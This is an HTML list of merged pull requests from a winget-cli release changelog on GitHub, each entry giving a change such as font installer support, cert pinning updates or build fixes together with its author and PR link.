<li>Update schema to 1.12 with Font InstallerType by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3352674785" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5687" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5687/hovercard" href="https://github.com/microsoft/winget-cli/pull/5687">#5687</a></li>
<li>Download MS Store package for target OS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3353562454" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5689" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5689/hovercard" href="https://github.com/microsoft/winget-cli/pull/5689">#5689</a></li>
<li>Fixes for older OSes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3357315204" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5691" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5691/hovercard" href="https://github.com/microsoft/winget-cli/pull/5691">#5691</a></li>
<li>Add RestSource and tests for Manifest v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3360657592" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5695" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5695/hovercard" href="https://github.com/microsoft/winget-cli/pull/5695">#5695</a></li>
<li>Improve slow searches involving installed items by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3364993234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5701" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5701/hovercard" href="https://github.com/microsoft/winget-cli/pull/5701">#5701</a></li>
<li>Shorter default installer log filename by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368313385" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5705" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5705/hovercard" href="https://github.com/microsoft/winget-cli/pull/5705">#5705</a></li>
<li>Add the ARP correlation entry to the context for portable installs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3377690777" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5707" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5707/hovercard" href="https://github.com/microsoft/winget-cli/pull/5707">#5707</a></li>
<li>Fix two unrelated version issues by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3412285391" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5719" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5719/hovercard" href="https://github.com/microsoft/winget-cli/pull/5719">#5719</a></li>
<li>Heal tracking database if it can't open by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419506355" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5724" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5724/hovercard" href="https://github.com/microsoft/winget-cli/pull/5724">#5724</a></li>
<li>MS Store cert pinning updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3436228691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5732" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5732/hovercard" href="https://github.com/microsoft/winget-cli/pull/5732">#5732</a></li>
<li>Update MCP GP name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3446264966" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5736" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5736/hovercard" href="https://github.com/microsoft/winget-cli/pull/5736">#5736</a></li>
<li>Add workflow for automatic issue deduplication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cinnamon-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cinnamon-msft">@cinnamon-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450208289" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5738" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5738/hovercard" href="https://github.com/microsoft/winget-cli/pull/5738">#5738</a></li>
<li>moving workflow to parent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450382277" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5740" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5740/hovercard" href="https://github.com/microsoft/winget-cli/pull/5740">#5740</a></li>
<li>Cache information responses from REST sources by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3424158468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5726" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5726/hovercard" href="https://github.com/microsoft/winget-cli/pull/5726">#5726</a></li>
<li>Shared build props by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3458857805" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5749" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5749/hovercard" href="https://github.com/microsoft/winget-cli/pull/5749">#5749</a></li>
<li>Improve shared props layout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3459246168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5751" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5751/hovercard" href="https://github.com/microsoft/winget-cli/pull/5751">#5751</a></li>
<li>Fix portable path removal on upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3466370013" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5756" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5756/hovercard" href="https://github.com/microsoft/winget-cli/pull/5756">#5756</a></li>
<li>Minor update to release notes for v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470589894" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5761" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5761/hovercard" href="https://github.com/microsoft/winget-cli/pull/5761">#5761</a></li>
<li>Font Install, Uninstall, additional Font List by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3187280381" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5566" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5566/hovercard" href="https://github.com/microsoft/winget-cli/pull/5566">#5566</a></li>
<li>Fix install source and final progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474726946" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5764" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5764/hovercard" href="https://github.com/microsoft/winget-cli/pull/5764">#5764</a></li>
<li>Use winrt for time conversion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474607043" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5763" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5763/hovercard" href="https://github.com/microsoft/winget-cli/pull/5763">#5763</a></li>
<li>Change label_as_duplicate to false in workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3488439814" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5773" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5773/hovercard" href="https://github.com/microsoft/winget-cli/pull/5773">#5773</a></li>
<li>Remove openssl from sfsclient cgmanifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3489513239" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5775" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5775/hovercard" href="https://github.com/microsoft/winget-cli/pull/5775">#5775</a></li>
<li>Add admin check to uninstall of machine font by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3493108538" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5779" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5779/hovercard" href="https://github.com/microsoft/winget-cli/pull/5779">#5779</a></li>
<li>Add Font source group policy support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3302306142" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5646" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5646/hovercard" href="https://github.com/microsoft/winget-cli/pull/5646">#5646</a></li>
<li>Improve window thread termination by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3497595140" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5781" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5781/hovercard" href="https://github.com/microsoft/winget-cli/pull/5781">#5781</a></li>
<li>Fix portable installer issues when installing to non ascii path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500476031" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5788" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5788/hovercard" href="https://github.com/microsoft/winget-cli/pull/5788">#5788</a></li>
<li>Remove experimental from Font Install, Uninstall, and source by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500835567" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5791" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5791/hovercard" href="https://github.com/microsoft/winget-cli/pull/5791">#5791</a></li>
<li>Update NOTICE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511592613" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5801" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5801/hovercard" href="https://github.com/microsoft/winget-cli/pull/5801">#5801</a></li>
<li>Update localized strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3514675035" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5805" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5805/hovercard" href="https://github.com/microsoft/winget-cli/pull/5805">#5805</a></li>
<li>Bump version to 1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500474102" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5787" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5787/hovercard" href="https://github.com/microsoft/winget-cli/pull/5787">#5787</a></li>
<li>Move to latest 7.4 PS SDK by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3519731252" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5811" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5811/hovercard" href="https://github.com/microsoft/winget-cli/pull/5811">#5811</a></li>
<li>Enable MultiProcessorCompilation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3512401468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5804" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5804/hovercard" href="https://github.com/microsoft/winget-cli/pull/5804">#5804</a></li>
<li>Remove mention of WinGet Insider program from the README by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3558459633" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5832" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5832/hovercard" href="https://github.com/microsoft/winget-cli/pull/5832">#5832</a></li>
<li>Ignore ReleaseStatic outputs and clean intermediates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572615072" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5848" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5848/hovercard" href="https://github.com/microsoft/winget-cli/pull/5848">#5848</a></li>
<li>Make Repair-WGPM a COM-aware cmdlet and rework version retrieval by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3568289044" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5842" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5842/hovercard" href="https://github.com/microsoft/winget-cli/pull/5842">#5842</a></li>
<li>Unregister signal handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3593025660" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5861" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5861/hovercard" href="https://github.com/microsoft/winget-cli/pull/5861">#5861</a></li>
<li>Support associating export units with packages in subdirectories of install location by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3588654688" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5859" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5859/hovercard" href="https://github.com/microsoft/winget-cli/pull/5859">#5859</a></li>
<li>Send host geo to sandbox by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3617875168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5873" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5873/hovercard" href="https://github.com/microsoft/winget-cli/pull/5873">#5873</a></li>
<li>Update C++ nuget package references using new scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623390985" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5877" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5877/hovercard" href="https://github.com/microsoft/winget-cli/pull/5877">#5877</a></li>
<li>Update platform toolset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3627539923" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5882" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5882/hovercard" href="https://github.com/microsoft/winget-cli/pull/5882">#5882</a></li>
<li>Extract event log for potential crash info by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3518633143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5807" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5807/hovercard" href="https://github.com/microsoft/winget-cli/pull/5807">#5807</a></li>
<li>Update CODEOWNERS to include winget-developers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3649373914" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5891" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5891/hovercard" href="https://github.com/microsoft/winget-cli/pull/5891">#5891</a></li>
<li>Fixes for VS2026 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3665007222" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5896" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5896/hovercard" href="https://github.com/microsoft/winget-cli/pull/5896">#5896</a></li>
<li>Additional logging limitations and control by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3639765799" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5888" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5888/hovercard" href="https://github.com/microsoft/winget-cli/pull/5888">#5888</a></li>
<li>Use hybrid CRT linkage instead of full static by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3713123433" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5913" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5913/hovercard" href="https://github.com/microsoft/winget-cli/pull/5913">#5913</a></li>
<li>Enable source reference to get thread globals for off-thread logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3496366336" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5780" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5780/hovercard" href="https://github.com/microsoft/winget-cli/pull/5780">#5780</a></li>
<li>Fix JSON, missing closing brace by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
<li>Test host for in-proc COM module validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3700306254" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5910" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5910/hovercard" href="https://github.com/microsoft/winget-cli/pull/5910">#5910</a></li>
<li>Add sleep to allow background threads to quiesce by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736500167" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5933" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5933/hovercard" href="https://github.com/microsoft/winget-cli/pull/5933">#5933</a></li>
<li>Allow suppressing configuration output on test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3503762781" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5794" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5794/hovercard" href="https://github.com/microsoft/winget-cli/pull/5794">#5794</a></li>
<li>Enable Explicit toggling for sources (i.e. Enable/Disable) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3682063243" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5904" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5904/hovercard" href="https://github.com/microsoft/winget-cli/pull/5904">#5904</a></li>
<li>Fix fuzz build by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736419630" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5932" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5932/hovercard" href="https://github.com/microsoft/winget-cli/pull/5932">#5932</a></li>
